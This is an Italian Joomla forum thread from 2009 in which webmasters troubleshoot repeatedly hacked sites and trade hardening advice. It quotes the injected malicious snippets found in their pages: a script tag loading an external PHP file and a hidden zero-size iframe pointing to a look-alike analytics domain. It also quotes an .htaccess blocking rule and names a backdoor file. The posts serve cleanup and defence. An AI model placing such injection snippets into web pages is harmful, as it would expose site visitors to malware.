Back to top

Autore Topic: files malevoli e attacchi - consigli e accorgimenti per la sicurezza di joomla  (Letto 14176 volte)

Offline peterrey

  • Appassionato
  • ***
  • Post: 516
  • Sesso: Maschio
  • raccolgo per pulire il mondo
    • Mostra profilo
tra breve ci sarà una nuova realtà trashware

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #21 il: 24 Nov 2009, 16:35:58 »
anche i permessi erano ok  :-[

Offline peterrey

  • Appassionato
  • ***
  • Post: 516
  • Sesso: Maschio
  • raccolgo per pulire il mondo
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #22 il: 24 Nov 2009, 20:04:43 »
per il seo usi qualche componente ?
usi qualche componente che è presente su tutti i siti?
tra breve ci sarà una nuova realtà trashware

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #23 il: 25 Nov 2009, 00:27:07 »
no niente seo.

i componenti presenti su tutti adesso sono quelli citati prima per la sicurezza (eyesite, jsecure, joomlpack)

 :'(

dire che sono disperato e dire poco.

devo rimettere apposto una trentina di siti, e cerchero di farli in questa nottata

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #24 il: 25 Nov 2009, 00:59:35 »
sto consultando il forum security di joomla.org, inizio a raccogliere info e a postarle qui.

per ora ho letto che è consigliato utilizzare il mod rewriter e il mod security.

anche se da quel che ho letto il mod security si trova dentro apache quindi e compito dell'hoster, giusto??


chi ne sa qualcosa in più?

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #25 il: 25 Nov 2009, 14:47:56 »
vi segnalo questo fantastico post

http://forum.joomla.org/viewtopic.php?f=432&t=391251

sto apportando le modifiche che vengono suggerite, vi faccio sapere.

spero di risolvere cosi almeno dopo settimane di nottate passate a ripristinare siti forse riusciro a dormire.

oppure mi impicco....

Offline foxhy

  • Esploratore
  • **
  • Post: 128
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #26 il: 28 Nov 2009, 23:31:34 »
Ciao gippy88, ho visto che hai scritto un post su:
http://forum.joomla.org/viewtopic.php?f=432&t=391251
Che riguarda la modifica del file .htaccess, ho fatto una prova in locale e ho avuto lo stesso problema "error 500".
Lunica cosa che sono riuscito a capire è che l'errore dipende dalla riga dove c'è questa istruzione:
Codice: [Seleziona]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]

Eliminando questa riga tutto funziona perfettamente.
Ora la domanda è che cosa c'è che non va in questo codice?
Ci vorrebbe l'aiuto di qualche esperto....speriamo!

Portale dei frantoi e dell'olio extravergine di oliva

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #27 il: 29 Nov 2009, 13:20:01 »
grazie foxhy!

io invece ho brutte notizie, nonostante tutte quelle precauzioni oggi controllando un sito mi sono ritrovato tutti gli index.html (quelli che trovi in ogni cartella vuoti)

con il seguente codice..

<html><script src=http://haaijk.nl/images/index.php ></script><body bgcolor="#FFFFFF"></body></html>

oppure

<html><body bgcolor="#FFFFFF"></body></html><iframe qhdik='gpPJWim3' src='http://googie-analytics.ws/in.cgi?3 ' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>

o ancora peggio pagine e pagine piene di codice binario...

tutto ciò è molto grave, i permessi sono impostati con accuratezza cosi come descritto in quel post di joomla.org che ho citato.


come è possibile secondo voi?

ma il team di joomla è al corrente di tutto ciò?

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #28 il: 29 Nov 2009, 14:36:06 »
come si spiega che tutti i file index.html che si trovano in ogni cartella dopo un pò di giorni vengono TUTTI riempiti di script malevoli??

premettendo che i permessi su questi file sono 644, come è possibile??

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #29 il: 29 Nov 2009, 14:51:41 »
gippy88 tieni per caso un contatore di visite esterno?
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #30 il: 29 Nov 2009, 15:04:16 »
no, nessun componente strano, solo quelli standard, quelli che ho aggiunto io sono eyesite, joomlapack, jsecure.
ccnewsletter, l'ho disattivato momentaneamente.

joomla reservation ho visto che è tra le componenti non sicure e ho tolto anche quello.

oziogallery2 è l'unico componente aggiuntivo installato.

cmq al momento ho risolto per tutti gli altri siti, solo questo in questione è stato nuovamente attaccato.

che ne pensate?
template jaw012.

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #31 il: 29 Nov 2009, 15:33:05 »
Citazione
eyesite,
che roba sarebbe?
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline foxhy

  • Esploratore
  • **
  • Post: 128
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #32 il: 29 Nov 2009, 16:00:49 »
Secondo me entrano per vie diverse, una cosa simile mi era capitata alcuni mesi fa su alcuni siti. leggi questo post ti potrebbe aiutare a capire
http://forum.joomla.it/index.php/topic,66172.msg289508.html#msg289508

In sostanza quando qualcuno riesce ad entrare con permessi FTP, si assicura gli accessi successivi inserendo una sua porta di ingresso personalizzata. Devi controllare uno per uno tutti i file e le cartelle del tuo sito "UNA BELLA SCANSIONE PROFONDA".

Portale dei frantoi e dell'olio extravergine di oliva

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #33 il: 29 Nov 2009, 17:53:02 »
si per il template e moduli/componenti aggiuntivi faccio cosi, me li controllo tutti, (grazie a konqueror lo faccio molto velocemente), per il resto copio sovrascrivendo le cartelle administrator, component ecc ecc i file originali di installazione di joomla, tranne ovviamente la cartela installation, cosi mi rimette tutto apposto, poi grazie abackup etc sto risolvendo, ad oggi credo di aver risolto, almeno il 90% dei problemi che avevo prima.

per quanto riguarda quel sito che mi si era nuovamente infettato ho trovato un file .php nella cartella images che avevo caricato io nuovamente da un backup vecchio già corrotto. ora a quanto pare ho risolto definitivamente.


com_eyesite è un componente che controlla gli accessi "strani" al sito.
è consigliato anche nel forum sicurezza joomla.org

grazie ragazzi, teniamoci in contatti per ulteriori trucchetti e soluzioni.

buon lavoro

Offline 56francesco

  • Fuori controllo
  • *
  • Post: 29585
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #34 il: 29 Nov 2009, 18:00:54 »
Citazione
per quanto riguarda quel sito che mi si era nuovamente infettato ho trovato un file .php nella cartella images che avevo caricato io nuovamente da un backup vecchio già corrotto.
;D ;D
(uso XP perchè win98 non si installa) 
PS: non sono un dipendente dello sbonzor quindi è necessario un "per favore" alla richiesta e un "grazie" alla risposta, sempre! PPS: non scrivo mai per primo in MP, in caso contrario chiedimi una conferma, Grazie.

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #35 il: 29 Nov 2009, 19:49:48 »
cioè?

Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #36 il: 02 Dic 2009, 09:47:43 »
ragazzi un altro trucchetto.

nel caso vi troviate il sito infetto.
la prima cosa da controllare è la cartella images, dentro ci troverete un file gifimg.php ovviamente eliminatelo.



Offline gippy88

  • Esploratore
  • **
  • Post: 127
  • Sesso: Maschio
    • Mostra profilo
Re:sito malevolo - consigli e accorgimenti per la sicurezza
« Risposta #37 il: 02 Dic 2009, 11:33:40 »
quando passate tra una pagina e l'altra del backend e frontend in basso nel vostro browser potete vedere...
caricamento da "vostro sito"
se avete caricamento da qualche altro sito dovete preoccuparvi.

ho riscontrato che quasi sempre
quando esce qualcos'altro (e quindi siete nei guai)
gli altri siti che escono sono

prathams.in
aaijack.nl

entrambi i siti se visitati non permettono l'accesso. ma facendo un who.is si può notate che il propietario è http://dcd.in/ un'agenzia di webdesign.

non sarà mica il caso di fargli una visita muniti di spranghe??!!

possiamo organizzare un pullman??

 :)

 



Web Design Bolzano Kreatif